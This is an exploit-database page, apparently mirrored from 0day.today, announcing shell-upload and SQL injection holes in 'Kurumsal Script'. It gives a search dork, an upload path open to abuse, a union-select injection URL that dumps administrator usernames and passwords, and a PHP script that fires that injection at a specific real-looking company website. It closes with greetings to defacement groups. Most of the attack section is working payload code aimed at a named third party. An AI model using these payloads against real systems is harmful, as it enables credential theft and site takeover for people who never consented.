Lucene search
+L

Kurumsal Script Multiple Vulnerability

🗓️ 25 Aug 2013 00:00:00Reported by BayparsType 
zdt
 zdt
🔗 0day.today👁 28 Views

Kurumsal Script Multiple Vulnerabilit

Code
Dork: Must google image search
http://www.bozdemirbilgisayar.com/images/logo.png


1-) Shell Upload Vuln

===============================
http://site.com/upload/upload.php



2-) Sql İnj Vuln

===============================
http://site.com/urunkat.php?url=bilgisayar'+and+false+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+administrator--+-



## All Exploited by Baypars ##

Special Thanks 
===============================
 ynR ! - Melallanguid - T3kfurD4GLı - Ferid23 - Artist - Cromber
and b3yaz.ORG and Anti-Armenia.ORG all users
===============================
Shell Upload Vulnerability founded by ynR !


<?php
$fp = fsockopen("www.bozdemirbilgisayar.com", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out = "GET /urunkat.php?url=bilgisayar'+and+false+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+administrator--+- HTTP/1.1\r\n";
    $out .= "Host: www.bozdemirbilgisayar.com\r\n";
    $out .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0<Coded by Baypars>\r\n";
    $out .= "Referer: www.bozdemirbilgisayar.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>

#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation